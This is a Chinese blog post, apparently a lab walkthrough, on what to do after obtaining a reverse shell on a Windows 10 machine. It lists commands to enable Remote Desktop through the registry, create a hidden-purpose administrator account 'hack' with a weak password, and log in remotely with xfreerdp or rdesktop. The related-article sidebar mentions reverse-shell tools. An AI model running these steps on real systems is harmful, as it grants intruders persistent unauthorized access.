Windows10拿到shell后远程登录

于 2024-08-22 00:33:56 发布
阅读量104 收藏 3
点赞数 1
文章标签: linux 服务器 运维 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74263993/article/details/141404603
版权

一、准备工作

kali机:192.168.19.130

win10:192.168.19.133

主机:192.168.1.73(自己操作可以在kali上,我这是因为反弹的shell在主机上)

二、开启远程登录

1.win10上关闭实时保护,并且运行了反弹shell的脚本(关于如何反弹shell下次再写一篇文章,这里主要讲拿到shell后如何远程登录)

 2.主机上进行监听拿到shell

3.查看远程登录3389端口是否打开

netstat -an

 这边发现没有打开

 4.windows打开3389远程连接的命令有两种办法(前提是自己拿到的shell是管理员权限)

(1)

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

(2)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

5.再次查看3389是否打开(对于有些系统命令端就是打开不了远程连接,那就要在设置里手动打开了)

也可用netstat -an|find "3389"查看端口是否打开,不过有时候不回显,我的就是

6.确认远程连接端口是不是3389(因为有些人会将远程连接的端口更改)

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

 0xd3d转换成十进制就是3389

 三、创建用于登录的用户(前提当前用户是管理员)

1.Windows创建用户命令

net user hack 123456 /add

2.将用户添加进管理员组命令

net localgroup administrators hack /add

3.查看用户

net user

 

四、kali远程登录

1.xfreerdp工具

/u就是用户名,/p是密码,/v是靶机(目标)的地址/size就是图形化界面的大小

xfreerdp /u:hack /p:123456 /v:192.168.19.133 /size:80%

 输入Y

然后就是连上了

2.rdesktop 工具

rdesktop 192.168.19.133

输入yes

 五、中断连接

1.查看rdesktop或xfreerdp的进程

ps aux | grep rdesktop

 2.中断进程

kill -9 进程号

小黑子不会打篮球
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell脚本,通过snmp方式获取远程服务器的CPU内存和硬盘的使用率
06-15
在IT管理领域,远程监控服务器的状态是至关重要的任务,尤其是CPU、内存和硬盘的使用率,这些指标直接反映了...这个过程不仅涉及到了Shell脚本编程,还涉及到对SNMP协议的理解和应用,对于提升IT专业技能非常有帮助。
使用xp_cmdshell注销Windows登录用户(终端服务器超出最大连接数)
09-10
这种情况通常发生在多用户同时远程访问同一台服务器时,如果某个用户登录后未正确注销,导致其他用户无法再进行新的连接。解决这个问题的一种方法是通过SQL Server中的`xp_cmdshell`扩展存储过程来注销Windows登录...
WinSCP远程登录工具
08-31
WinSCP是一款专为Windows用户设计的强大且易用的SSH(Secure SHell)协议文件传输工具。它集成了SFTP(Secure File Transfer Protocol)和FTP(File Transfer Protocol)服务,提供了安全的文件交互环境,是Windows用户...
putty 远程登录工具
10-29
PuTTY是一款广受欢迎的免费开源远程登录工具,主要用于连接到基于网络的服务器,尤其是支持SSH(Secure Shell)协议的服务器。这款工具以其简洁易用的界面和强大的功能,在IT行业中得到了广泛应用。 首先,PuTTY的...
getshell神器-蚁剑,包含Linux windows双系统
08-10
3. **强大的命令执行**:蚁剑内置了多种系统命令,可以直接在Webshell上执行,包括文件操作、进程管理、网络通信等,使你在远程服务器上进行操作如同本地一样便捷。 4. **安全加密通信**:为了保障数据传输的安全性...
Linux上构建Windows应用程序:深入探索跨平台开发的实践与挑战
w651428055的博客
08-21 553
Linux上构建Windows应用程序,不仅拓宽了开发者的技能范围,也为软件产品的多平台部署提供了灵活性和成本效益。虽然这一过程面临挑战,但通过合理选择工具、框架和策略,可以有效地克服这些障碍。随着技术的不断进步,跨平台开发将变得更加成熟和便捷,为软件开发带来更多的可能性和机遇。未来,随着更多高效工具和框架的出现,跨平台开发的效率和质量有望进一步提升,为软件工程领域注入新的活力。
linux定期统计某个目录内每天的文件增量大小
mengbing1990的博客
08-21 51
每天统计一次前一天的日志量大小,并将每个目录的大小记录一份日志。 本测试脚本下,所有目录产生的日志均有固定格式,如每个目录不一样的话,需定义find语句中的name变量。
Nginx安装配置(Linux),反向代理,负载均衡
m0_46290969的博客
08-18 1023
nginx安装教程,做反向代理,负载均衡
Linux】生产消费模型实践 --- 基于信号量的环形队列
最新发布
JLX_1的博客
08-21 348
本文实践了生产消费模型,通过基于信号量的环形队列来模拟生产消费的过程!讲解了信号量的相关基础知识!
Linux之RabbitMQ集群部署
m0_54563444的博客
08-21 837
消息中间件也可以称消息队列,是利用高效可靠的消息传递机制进行异步的数据传输并基于数据通信来进行分布式系统的集成。当下主流的消息中间件有等。Kafka是LinkedIn开源的分布式发布-订阅消息系统,目前归属于Apache顶级项目。Kafka主要特点是追求高吞吐量(单机可达到10万级)时效性是毫秒级的,一开始的目的就是用于日志收集和传输。对消息的重复、丢失、错误没有严格要求,适合产生大量数据的互联网服务的数据收集业务。
Linux Xfce 桌面环境系统休眠的问题
Wynter
08-17 418
通过这些步骤,你应该能够解决 Xfce 桌面环境中的系统休眠问题。如果问题仍然存在,可能需要进一步检查硬件兼容性或寻求更专业的技术支持。确保你的硬件驱动程序正确支持电源管理功能。特别是对于笔记本电脑,显卡和电池驱动程序的兼容性非常重要。确保你的系统上运行着正确的电源管理守护进程。在大多数现代 Linux 发行版中,这通常是。查看系统日志可能会提供一些关于为什么系统进入休眠状态的线索。如果你暂时不需要系统休眠功能,可以禁用它。
linux 网卡配置
轻口味的专栏
08-21 404
linux网卡可以通过命令和配置文件配置,如果是桌面环境还可以通过图形化界面配置.
Linux CentOS 通过rsync+inotify实现文件实时同步
云计算课代表
08-21 791
inotify是一种强大的、细粒度的、异步的文件系统事件监听机制,可以监听文件系统中添加、删除,修改、移动等各种细微事件,做到对事件的实时响应,高效并且没有轮询造成的系统资源消耗。
Linux】文件系统
2301_77438812的博客
08-17 785
文件系统
如何备份Linux整个系统
ithongchou的博客
08-16 152
备份整个 Linux 系统是确保数据安全的重要步骤。你可以使用多种方法来实现这一目标,包括使用系统自带工具、第三方备份软件以及专业的备份解决方案。选择适合你的需求和环境的备份方案可以帮助你有效地备份和恢复 Linux 系统。是一种常用的文件同步工具,可以进行增量备份,比较适合定期备份。: 一个开源的磁盘克隆和备份工具,支持多种文件系统和磁盘格式。是一个低级别的磁盘复制工具,可以创建整个磁盘的镜像。: 一个企业级备份解决方案,提供强大的备份和恢复功能。: 支持加密和增量备份的工具。
Linux设置yum源为阿里云镜像源
小诸葛的博客
08-17 260
如果ping不通,则找一台可以连接外网的电脑,ping一下mirrors.aliyun.com,找到mirrors.aliyun.com对应的ip。五、查看yum源信息,已经更换为了阿里云镜像源。三、下载阿里云Centos-7.repo文件。一、验证网络是否可以连接阿里云镜像。
Linux:进程信号
MaoRuofeng的博客
08-19 676
OS是进程的管理者。
linux shell 脚本 let 数学计算
abc
08-20 153
需要注意的是,虽然let命令在数字计算方面功能强大,但它不能直接输出结果,也不能与条件判断一起使用。‌let命令‌是Bash shell中的一个内置命令,用于执行算术运算并将结果赋值给变量。let命令支持各种算术运算符,包括加、减、乘、除、取模等,并且还提供了方幂“**”运算符。使用逻辑运算符进行条件判断,如let “a = 5 > 3”(将返回1表示真,0表示假)。它提供了一组常用的算术运算符,包括加、减、乘、除等,并且支持自增和自减操作。let命令的语法是let 变量名=整数运算表达式,
Linux 软件编程学习第十五天
mxyzhy的博客
08-17 1336
Linux网络编程学习
windows 反弹shell
07-29
在Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell的攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows下反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows下反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值